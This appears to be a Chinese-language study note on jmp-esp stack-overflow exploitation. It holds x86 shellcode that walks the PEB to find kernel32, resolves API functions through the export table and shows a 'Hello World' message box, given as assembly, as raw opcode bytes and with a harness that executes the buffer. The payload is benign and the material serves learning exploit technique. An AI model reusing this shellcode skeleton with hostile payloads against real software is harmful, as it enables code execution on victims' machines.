利用 jmp esp的原理 windows中有很多这种指令
先用dbg找一个
再把shellcode 转成opcode可以先测试一下(代码与opcode在最后)
后面多搞一些90 90 因为有的函数有几个参数
运行
// ConsoleApplication2.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
int _tmain(int argc, _TCHAR* argv[])
{
__asm {
pushad;
sub esp, 0x100;
jmp tag_Shellcode;
//[tag_Next-0x52] "GetProcAddress"
_asm _emit(0x47) _asm _emit(0x65) _asm _emit(0x74) _asm _emit(0x50)
_asm _emit(0x72) _asm _emit(0x6f) _asm _emit(0x63) _asm _emit(0x41)
_asm _emit(0x64) _asm _emit(0x64) _asm _emit(0x72) _asm _emit(0x65)
_asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)
//[tag_Next-0x44] "LoadLibraryExA\0"
_asm _emit(0x4c) _asm _emit(0x6f) _asm _emit(0x61) _asm _emit(0x64)
_asm _emit(0x4c) _asm _emit(0x69) _asm _emit(0x62) _asm _emit(0x72)
_asm _emit(0x61) _asm _emit(0x72) _asm _emit(0x79) _asm _emit(0x45)
_asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)
//[tag_Next-0x35] "User32.dll\0"
_asm _emit(0x55) _asm _emit(0x73) _asm _emit(0x65) _asm _emit(0x72)
_asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2e) _asm _emit(0x64)
_asm _emit(0x6c) _asm _emit(0x6c) _asm _emit(0x00)
//[tag_Next-0x2A] "MessageBoxA\0"
_asm _emit(0x4d) _asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73)
_asm _emit(0x61) _asm _emit(0x67) _asm _emit(0x65) _asm _emit(0x42)
_asm _emit(0x6f) _asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)
//[tag_Next-0x1E] "ExitProcess\0"
_asm _emit(0x45) _asm _emit(0x78) _asm _emit(0x69) _asm _emit(0x74)
_asm _emit(0x50) _asm _emit(0x72) _asm _emit(0x6f) _asm _emit(0x63)
_asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)
//[tag_Next-0x12] "Hello World!\0"
_asm _emit(0x48) _asm _emit(0x65) _asm _emit(0x6c) _asm _emit(0x6c)
_asm _emit(0x6f) _asm _emit(0x20) _asm _emit(0x57) _asm _emit(0x6f)
_asm _emit(0x72) _asm _emit(0x6c) _asm _emit(0x64) _asm _emit(0x21)
_asm _emit(0x00)
tag_Shellcode:
call tag_Next;
tag_Next:
pop ebx;
//获取关键模块基址
mov esi, dword ptr fs : [0x30];
mov esi, [esi + 0x0c];
mov esi, [esi + 0x1c];
mov esi, [esi];
mov edx, [esi + 0x08];
//获取GetProcAddress的函数地址
push ebx;
push edx;
call fun_GetProcAddress;
mov esi, eax;
//获取LoadLibraryExA的函数地址
push edx;
lea ecx, [ebx - 0x44];
push ecx;
push edx;
call eax;
pop edx;
//调用Payload部分
push ebx;
push esi;
push eax;
push edx;
call fun_Payload;
fun_GetProcAddress:
push ebp;
mov ebp, esp;
sub esp, 0x0c;
push edx;
//获取EAT、ENT和EOT的地址
mov edx, [ebp + 0x08];
mov esi, [edx + 0x3c];
lea esi, [edx + esi];
mov esi, [esi + 0x78];
lea esi, [edx + esi];
mov edi, [esi + 0x1c];
lea edi, [edx + edi];
mov[ebp - 0x04], edi;
mov edi, [esi + 0x20];
lea edi, [edx + edi];
mov[ebp - 0x08], edi;
mov edi, [esi + 0x24];
lea edi, [edx + edi];
mov[ebp - 0x0c], edi;
//循环对比ENT中的函数名
xor eax, eax;
jmp tag_FirstCmp;
tag_CmpFunNameLoop:
inc eax;
tag_FirstCmp:
mov esi, [ebp - 0x08];
mov esi, [esi + 4 * eax];
mov edx, [ebp + 0x08];
lea esi, [edx + esi];
mov ebx, [ebp + 0x0c];
lea edi, [ebx - 0x53];
mov ecx, 0x0e;
cld;
repe cmpsb;
jne tag_CmpFunNameLoop;
//成功后找到对应的序号
mov esi, [ebp - 0x0c];
xor edi, edi;
mov di, [esi + eax * 2];
//使用序号作为索引,找到函数名所对应的函数地址
mov edx, [ebp - 0x04];
mov esi, [edx + edi * 4];
mov edx, [ebp + 0x08];
//返回获取到的关键函数地址
lea eax, [edx + esi];
pop edx;
mov esp, ebp;
pop ebp;
retn 0x08;
fun_Payload:
push ebp;
mov ebp, esp;
sub esp, 0x08;
mov ebx, [ebp + 0x14];
//获取MessageBoxA的函数地址
lea ecx, [ebx - 0x35];
push 0;
push 0;
push ecx;
call[ebp + 0x0c];
lea ecx, [ebx - 0x2A];
push ecx;
push eax;
call[ebp + 0x10];
mov[ebp - 0x04], eax;
//获取ExitProcess的函数地址
lea ecx, [ebx - 0x1E];
push ecx;
push[ebp + 0x08];
call[ebp + 0x10];
mov[ebp - 0x08], eax;
//显示
lea ecx, [ebx - 0x12];
push 0;
push ecx;
push ecx;
push 0;
call[ebp - 0x04];
push 0;
call[ebp - 0x08];
mov esp, ebp;
pop ebp;
retn 0x10;
}
return 0;
}
#include "stdafx.h"
int _tmain(int argc, _TCHAR* argv[])
{
char bShellcode[] = { "\x60\x81\xEC\x00\x01\x00\x00\xEB\x4E\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x64\x6C\x6C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\xE8\x00\x00\x00\x00\x5B\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x56\x08\x53\x52\xE8\x14\x00\x00\x00\x8B\xF0\x52\x8D\x4B\xBC\x51\x52\xFF\xD0\x5A\x53\x56\x50\x52\xE8\x6E\x00\x00\x00\x55\x8B\xEC\x83\xEC\x0C\x52\x8B\x55\x08\x8B\x72\x3C\x8D\x34\x32\x8B\x76\x78\x8D\x34\x32\x8B\x7E\x1C\x8D\x3C\x3A\x89\x7D\xFC\x8B\x7E\x20\x8D\x3C\x3A\x89\x7D\xF8\x8B\x7E\x24\x8D\x3C\x3A\x89\x7D\xF4\x33\xC0\xEB\x01\x40\x8B\x75\xF8\x8B\x34\x86\x8B\x55\x08\x8D\x34\x32\x8B\x5D\x0C\x8D\x7B\xAD\xB9\x0E\x00\x00\x00\xFC\xF3\xA6\x75\xE3\x8B\x75\xF4\x33\xFF\x66\x8B\x3C\x46\x8B\x55\xFC\x8B\x34\xBA\x8B\x55\x08\x8D\x04\x32\x5A\x8B\xE5\x5D\xC2\x08\x00\x55\x8B\xEC\x83\xEC\x08\x8B\x5D\x14\x8D\x4B\xCB\x6A\x00\x6A\x00\x51\xFF\x55\x0C\x8D\x4B\xD6\x51\x50\xFF\x55\x10\x89\x45\xFC\x8D\x4B\xE2\x51\xFF\x75\x08\xFF\x55\x10\x89\x45\xF8\x8D\x4B\xEE\x6A\x00\x51\x51\x6A\x00\xFF\x55\xFC\x6A\x00\xFF\x55\xF8\x8B\xE5\x5D\xC2" };
__asm {
lea eax, bShellcode;
push eax;
ret
}
return 0;
}
"\x60\x81\xEC\x00\x01\x00\x00\xEB\x4E\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x64\x6C\x6C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\xE8\x00\x00\x00\x00\x5B\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x56\x08\x53\x52\xE8\x14\x00\x00\x00\x8B\xF0\x52\x8D\x4B\xBC\x51\x52\xFF\xD0\x5A\x53\x56\x50\x52\xE8\x6E\x00\x00\x00\x55\x8B\xEC\x83\xEC\x0C\x52\x8B\x55\x08\x8B\x72\x3C\x8D\x34\x32\x8B\x76\x78\x8D\x34\x32\x8B\x7E\x1C\x8D\x3C\x3A\x89\x7D\xFC\x8B\x7E\x20\x8D\x3C\x3A\x89\x7D\xF8\x8B\x7E\x24\x8D\x3C\x3A\x89\x7D\xF4\x33\xC0\xEB\x01\x40\x8B\x75\xF8\x8B\x34\x86\x8B\x55\x08\x8D\x34\x32\x8B\x5D\x0C\x8D\x7B\xAD\xB9\x0E\x00\x00\x00\xFC\xF3\xA6\x75\xE3\x8B\x75\xF4\x33\xFF\x66\x8B\x3C\x46\x8B\x55\xFC\x8B\x34\xBA\x8B\x55\x08\x8D\x04\x32\x5A\x8B\xE5\x5D\xC2\x08\x00\x55\x8B\xEC\x83\xEC\x08\x8B\x5D\x14\x8D\x4B\xCB\x6A\x00\x6A\x00\x51\xFF\x55\x0C\x8D\x4B\xD6\x51\x50\xFF\x55\x10\x89\x45\xFC\x8D\x4B\xE2\x51\xFF\x75\x08\xFF\x55\x10\x89\x45\xF8\x8D\x4B\xEE\x6A\x00\x51\x51\x6A\x00\xFF\x55\xFC\x6A\x00\xFF\x55\xF8\x8B\xE5\x5D\xC2"
77460a9b jmp esp 地址
{
0x60, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0xEB, 0x4E, 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63,
0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72,
0x61, 0x72, 0x79, 0x45, 0x78, 0x41, 0x00, 0x55, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2E, 0x64, 0x6C,
0x6C, 0x00, 0x4D, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6F, 0x78, 0x41, 0x00, 0x45, 0x78,
0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20,
0x57, 0x6F, 0x72, 0x6C, 0x64, 0x21, 0x00, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5B, 0x64, 0x8B, 0x35,
0x30, 0x00, 0x00, 0x00, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x1C, 0x8B, 0x36, 0x8B, 0x56, 0x08, 0x53,
0x52, 0xE8, 0x14, 0x00, 0x00, 0x00, 0x8B, 0xF0, 0x52, 0x8D, 0x4B, 0xBC, 0x51, 0x52, 0xFF, 0xD0,
0x5A, 0x53, 0x56, 0x50, 0x52, 0xE8, 0x6E, 0x00, 0x00, 0x00, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x0C,
0x52, 0x8B, 0x55, 0x08, 0x8B, 0x72, 0x3C, 0x8D, 0x34, 0x32, 0x8B, 0x76, 0x78, 0x8D, 0x34, 0x32,
0x8B, 0x7E, 0x1C, 0x8D, 0x3C, 0x3A, 0x89, 0x7D, 0xFC, 0x8B, 0x7E, 0x20, 0x8D, 0x3C, 0x3A, 0x89,
0x7D, 0xF8, 0x8B, 0x7E, 0x24, 0x8D, 0x3C, 0x3A, 0x89, 0x7D, 0xF4, 0x33, 0xC0, 0xEB, 0x01, 0x40,
0x8B, 0x75, 0xF8, 0x8B, 0x34, 0x86, 0x8B, 0x55, 0x08, 0x8D, 0x34, 0x32, 0x8B, 0x5D, 0x0C, 0x8D,
0x7B, 0xAD, 0xB9, 0x0E, 0x00, 0x00, 0x00, 0xFC, 0xF3, 0xA6, 0x75, 0xE3, 0x8B, 0x75, 0xF4, 0x33,
0xFF, 0x66, 0x8B, 0x3C, 0x46, 0x8B, 0x55, 0xFC, 0x8B, 0x34, 0xBA, 0x8B, 0x55, 0x08, 0x8D, 0x04,
0x32, 0x5A, 0x8B, 0xE5, 0x5D, 0xC2, 0x08, 0x00, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x8B, 0x5D,
0x14, 0x8D, 0x4B, 0xCB, 0x6A, 0x00, 0x6A, 0x00, 0x51, 0xFF, 0x55, 0x0C, 0x8D, 0x4B, 0xD6, 0x51,
0x50, 0xFF, 0x55, 0x10, 0x89, 0x45, 0xFC, 0x8D, 0x4B, 0xE2, 0x51, 0xFF, 0x75, 0x08, 0xFF, 0x55,
0x10, 0x89, 0x45, 0xF8, 0x8D, 0x4B, 0xEE, 0x6A, 0x00, 0x51, 0x51, 0x6A, 0x00, 0xFF, 0x55, 0xFC,
0x6A, 0x00, 0xFF, 0x55, 0xF8, 0x8B, 0xE5, 0x5D, 0xC2
};
// ConsoleApplication4.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
/* mov esi, dword ptr fs : [0x30]
mov esi, [esi+0x0c]
mov esi, [esi+0x1c]
mov esi, [esi]
mov ebx, [esi+0x08]
*/
int _tmain(int argc, _TCHAR* argv[])
{
__asm
{
pushad
sub esp,0x20
jmp tag_shellcode
//GetProcAddress
_asm _emit(0x47) _asm _emit(0x65) _asm _emit(0x74) _asm _emit(0x50)
_asm _emit(0x72) _asm _emit(0x6F) _asm _emit(0x63) _asm _emit(0x41)
_asm _emit(0x64) _asm _emit(0x64) _asm _emit(0x72) _asm _emit(0x65)
_asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)
//LoadLibraryExA
_asm _emit(0x4C) _asm _emit(0x6F) _asm _emit(0x61) _asm _emit(0x64)
_asm _emit(0x4C) _asm _emit(0x69) _asm _emit(0x62) _asm _emit(0x72)
_asm _emit(0x61) _asm _emit(0x72) _asm _emit(0x79) _asm _emit(0x45)
_asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)
//User32.dll
_asm _emit(0x55) _asm _emit(0x73) _asm _emit(0x65) _asm _emit(0x72)
_asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64)
_asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00)
//MessageBoxA
_asm _emit(0x4D) _asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73)
_asm _emit(0x61) _asm _emit(0x67) _asm _emit(0x65) _asm _emit(0x42)
_asm _emit(0x6F) _asm _emit(0x78) _asm _emit(0x41) _asm _emit(0x00)
//ExitProcess
_asm _emit(0x45) _asm _emit(0x78) _asm _emit(0x69) _asm _emit(0x74)
_asm _emit(0x50) _asm _emit(0x72) _asm _emit(0x6F) _asm _emit(0x63)
_asm _emit(0x65) _asm _emit(0x73) _asm _emit(0x73) _asm _emit(0x00)
//FuckYou
_asm _emit(0x48) _asm _emit(0x65) _asm _emit(0x6C) _asm _emit(0x6C)
_asm _emit(0x6F) _asm _emit(0x20) _asm _emit(0x31) _asm _emit(0x35)
_asm _emit(0x50) _asm _emit(0x42) _asm _emit(0x21) _asm _emit(0x00)
tag_Shellcode:
call tag_Next
tag_Next:
pop ebx
mov esi, dword ptr fs : [0x30] //PEB的地址
mov esi, [esi+0x0c] //PEB_LDR_DATA结构的指针
mov esi, [esi+0x1c] //模块链表指针
mov esi, [esi] //第二个条目
mov edx, [esi+0x08] //kernel32.dll
push ebx //基址
push edx //kernel32.dll
call fun_GetProcAddress
mov esi,eax
push edx
lea ecx, [ebx-0x43]
push ecx
push edx
call eax
pop edx
push ebx
push esi
push eax
push edx
call fun_Payload
//获取关键函数地址,返回值关键函数地址
fun_GetProcAddress: //(int imagebase,int baseAddr)
push ebp
mov ebp,esp
sub esp,0x0c
push edx
//获取EAT,ENT,EOT
mov edx, [ebp+0x08] //edx =kernel32.dll
mov esi, [edx+0x3c] //esi =IMAGE_DOS_HEADER.e_lfanew
lea esi, [edx+esi] //PE文件头VA
mov esi, [esi+0x78] //IMAGE...EXPORT.VirtualAddress
lea esi, [edx+esi] //导出表VA
mov edi, [esi+0x1c] //IMAGE_EXP...AddressOfFunctions
lea edi, [edx+edi] //EAT vA
mov[ebp-0x04],edi //local1=edi=EAT VA
mov edi, [esi+0x20] //edi=AddressofName
lea edi, [edx+edi] //edi=ENT VA
mov[ebp-0x08],edi //local2=edi=ENT VA
mov edi, [esi+0x24] //AddressOfNameOrdinals
lea edi, [edx+edi] //edi=EOT VA
mov[ebp-0x0c],edi //local3=edi=EOT VA
xor eax,eax
jmp tag_FirstCmp
tag_CmpFunNameLoop:
inc eax
tag_FirstCmp:
mov esi, [ebp-0x08] //esi=loc2 ent
mov esi, [esi+4*eax] //esi=ENT RVA
mov edx, [ebp+0x08] //edx=Param_1(ImageBase)
lea esi, [edx+esi] //esi=ENT VA
mov ebx, [ebp+0x0c] //ebx=Pqram_2(BaseAddr)
lea edi, [ebx-0x52] //edi="GetProcAddress"
mov ecx,0x0E //eax="GetProcAddress"
cld
repe cmpsb
jne tag_CmpFunNameLoop
mov esi, [ebp-0x0c] //esi=Local3(EOT)
xor edi,edi
mov di, [esi+eax*2] //函数名数组下标在序号数组找到对应序号
mov edx, [ebp-0x04] //edx=local1(EAT)
mov esi, [edx+edi*4] //esi=用序号在函数地址数组找到对应的函数地址
mov edx, [ebp+0x08] //edx=param1(ImageBase)
lea eax, [edx+esi]
pop edx
mov esp,ebp
pop ebp
retn 0x08
fun_Payload://(int kerner32_base,int loadlibraryExW,int GetProcAddress,int BaseAddr)
push ebp
mov ebp, esp
sub esp, 0x08
mov ebx, [ebp + 0x14] //ebx=Param_4(BaseAddr)
//user32.dll
lea ecx, [ebx - 0x34] //"User32.dll\n"
push 0 //'-dwflags=0
push 0 //hfife=0
push ecx //plibfilename="user32.dll"
call[ebp + 0x0c] //loadlibraryExA()
lea ecx, [ebx - 0x29] //MessageBoxA()
push ecx //hModule=User32.dll 基址
push eax //GetProcAddress()
call[ebp + 0x10]
mov[ebp - 0x04], eax
//exit
lea ecx, [ebx - 0x1D] //'ExitProcess\0'
push ecx //'-lProName=ExitProcess'
push[ebp + 0x08] //Kernel32.dll=基址
call[ebp + 0x10] //GetProcAddress()
mov[ebp - 0x08], eax
//messagebox
lea ecx, [ebx - 0x11]
push 0
push ecx
push ecx
push 0
call[ebp - 0x04]
push 0
call[ebp - 0x08]
mov esp,ebp
pop ebp
retn 0x10
}
return 0;
}
//FS:[0]->_TEB
//_TEB+0x30->PPEB
//PEB+0x0C->LDR
//LDR+0x0C->InLoadOrderModuleList
//LDR+0x14->InMemoryOrderModuleList
//LDR+0x1C->InInitializationOrderModuleList
//InInitializationOrderModuleList+0x8->DllBase
//DllBase+0x3C->PEHead
//PEHead+0x78->ET
//ET+0x1C->EAT
//ET+0x20->ENT
//ET+0x24->EOT
/*
int main()
{
__asm
{
call tag_GetShellCodeBaseAddr;
tag_GetShellCodeBaseAddr:
pop ebx;
jmp tag_Code;
//"LoadLibraryA"
//VA:0x40100E
//RVA to ShellCodeBaseAddr = 0x8
__asm __emit(0x4c) __asm __emit(0x6f) __asm __emit(0x61) __asm __emit(0x64)
__asm __emit(0x4c) __asm __emit(0x69) __asm __emit(0x62) __asm __emit(0x72)
__asm __emit(0x61) __asm __emit(0x72) __asm __emit(0x79) __asm __emit(0x41)
__asm __emit(0x00)
//"GetProcAddress"
//VA:0x40101B
//RVA to ShellCodeBaseAddr = 0x15
__asm __emit(0x47) __asm __emit(0x65) __asm __emit(0x74) __asm __emit(0x50)
__asm __emit(0x72) __asm __emit(0x6f) __asm __emit(0x63) __asm __emit(0x41)
__asm __emit(0x64) __asm __emit(0x64) __asm __emit(0x72) __asm __emit(0x65)
__asm __emit(0x73) __asm __emit(0x73) __asm __emit(0x00)
//"ExitProcess"
//VA:0x40102A
//RVA to ShellCodeBaseAddr = 0x24
__asm __emit(0x45) __asm __emit(0x78) __asm __emit(0x69) __asm __emit(0x74)
__asm __emit(0x50) __asm __emit(0x72) __asm __emit(0x6f) __asm __emit(0x63)
__asm __emit(0x65) __asm __emit(0x73) __asm __emit(0x73) __asm __emit(0x00)
//"MessageBoxA"
//VA:0x401036
//RVA to ShellCodeBaseAddr = 0x30
__asm __emit(0x4d) __asm __emit(0x65) __asm __emit(0x73) __asm __emit(0x73)
__asm __emit(0x61) __asm __emit(0x67) __asm __emit(0x65) __asm __emit(0x42)
__asm __emit(0x6f) __asm __emit(0x78) __asm __emit(0x41) __asm __emit(0x00)
//"Hello World!"
//VA:0x401042
//RVA to ShellCodeBaseAddr = 0x3C
__asm __emit(0x48) __asm __emit(0x65) __asm __emit(0x6c) __asm __emit(0x6c)
__asm __emit(0x6f) __asm __emit(0x20) __asm __emit(0x57) __asm __emit(0x6f)
__asm __emit(0x72) __asm __emit(0x6c) __asm __emit(0x64) __asm __emit(0x21)
__asm __emit(0x00)
//"user32.dll"
//VA:0x40104F
//RVA to ShellCodeBaseAddr = 0x49
__asm __emit(0x75) __asm __emit(0x73) __asm __emit(0x65) __asm __emit(0x72)
__asm __emit(0x33) __asm __emit(0x32) __asm __emit(0x2e) __asm __emit(0x64)
__asm __emit(0x6c) __asm __emit(0x6c) __asm __emit(0x00)
tag_Code:
push ebp;
mov ebp, esp;
sub esp, 0x100;
sub ebp, 0x30;
sub ebx, 0x5;
mov[ebp + 0x4], ebx;//lpShellCodeBaseAddr
mov esi, fs:[0x30];
mov esi, [esi + 0x0C];
mov esi, [esi + 0x1C];
mov esi, [esi];//Get the second LDR_DATA_TABLE_ENTRY struct(Kernel32 or KernelBase 's)
mov esi, [esi];
mov esi, [esi + 0x8];
mov[ebp + 0x8], esi;//lpDllBaseAddr
//求LoadLibraryA 的地址
push 0xC;
mov edx, 0x8;
add edx, ebx;
push edx;
mov esi, [ebp + 0x8];
push esi;
call fnGetProcAddress;
mov[ebp + 0x10], eax;
//求GetProcAddress 的地址
push 0xE;
mov edx, 0x15;
add edx, ebx;
push edx;
push esi;
call fnGetProcAddress;
mov[ebp + 0xC], eax;
//求ExitProcess 的地址
push 0xB;
mov edx, 0x24;
add edx, ebx;
push edx;
mov esi, [ebp + 0x8];
push esi;
call fnGetProcAddress;
mov[ebp + 0x14], eax;
//加载user32.dll
mov edx, 0x49;
add edx, ebx;
push edx;
call[ebp + 0x10];
//寻MessageBoxA的地址
mov edx, 0x30;
add edx, ebx;
push edx;
push eax;
call[ebp + 0xC];
mov[ebp + 0x18], eax;//存MessageBoxA的地址
//MessageBox:"Hello World!"
xor ecx, ecx;
push ecx;
mov edx, 0x3C;
add edx, ebx;
push edx;
push edx;
push ecx;
call eax;
//ExitProcess
push ecx;
call[ebp + 0x14];
add ebp, 0x30;
mov esp, ebp;
pop ebp;
ret 0x10;
fnGetProcAddress://(LPVOID lpDllBaseAddr,char* pFuncName,int nFuncNameLen)
push ebp;
mov ebp, esp;
pushad;
sub esp, 0x20;
mov esi, [ebp + 0x8];//Param 1
//DllBase+0x3C->PEHead
mov eax, [esi + 0x3C];//IMAGE_DOS_HEADER.e_lfanew -> eax
lea esi, [esi + eax];//PE头VA
mov[esp + 0x8], esi;//将PE头VA存入参数2
//PEHead+0x78->ET
mov esi, [esi + 0x78];//IMAGE_DIR...EXPORT.VirtualAddress
add esi, [ebp + 0x8];//ET's VA
mov[esp + 0xC], esi;//将ET's VA存入参数3
//ET+0x1C->EAT
mov edi, [esi + 0x1C];//IMAGE_EXP...ORY.AddressOfFunctions
//lea edi, [edi + eax];//EAT's RVA
add edi, [ebp + 0x8];//EAT's VA
mov[esp + 0x10], edi;//将EAT's VA存入参数4
//ET+0x20->ENT
mov edi, [esi + 0x20];//IMAGE_EXP...ORY.AddressOfNames
//lea edi, [edi + eax];//ENT's RVA
add edi, [ebp + 0x8];//ENT's VA
mov[esp + 0x14], edi;//将ENT's VA存入参数5
//ET+0x24->EOT
mov edi, [esi + 0x24];//IMAGE_EXP...ORY.AddressOfNameOrdinals
//lea edi, [edi + eax];//EOT's RVA
add edi, [ebp + 0x8];//EOT's VA
mov[esp + 0x18], edi;//将EOT's VA存入参数6
xor eax, eax;
mov ebx, [ebp + 0x8];//Param 1
jmp tag_FirstLoop;
tag_FindLoop :
inc eax;
tag_FirstLoop:
mov esi, [esp + 0x14];//取ENT's VA
mov esi, [esi + 4 * eax];//下一个ENT RVA
lea esi, [ebx + esi];//ENT's VA
//add esi,ebx;
mov edi, [ebp + 0xC];//edi=Param 2
mov ecx, [ebp + 0x10];//ecx=Param 3
cld;
repe cmpsb;
jne tag_FindLoop;
//比对出对应序号:
mov esi, [esp + 0x18];//将EOT's VA存入esi
xor ebx, ebx;
mov bx, [esi + eax * 2];//找到EOT中的序号
mov edx, [esp + 0x10];//将EAT's VA存入edx
mov esi, [edx + ebx * 4];//找到EAT中的函数地址
mov eax, [ebp + 0x8];
lea eax, [eax + esi];//对应函数的返回值
mov[ebp + 0x8], eax;//保存在传入参数的位置
add esp, 0x20;
popad;
mov esp, ebp;
mov eax, [esp + 0x8];//回填返回值
pop ebp;
ret 0xC;
}
return 0;
}
*/
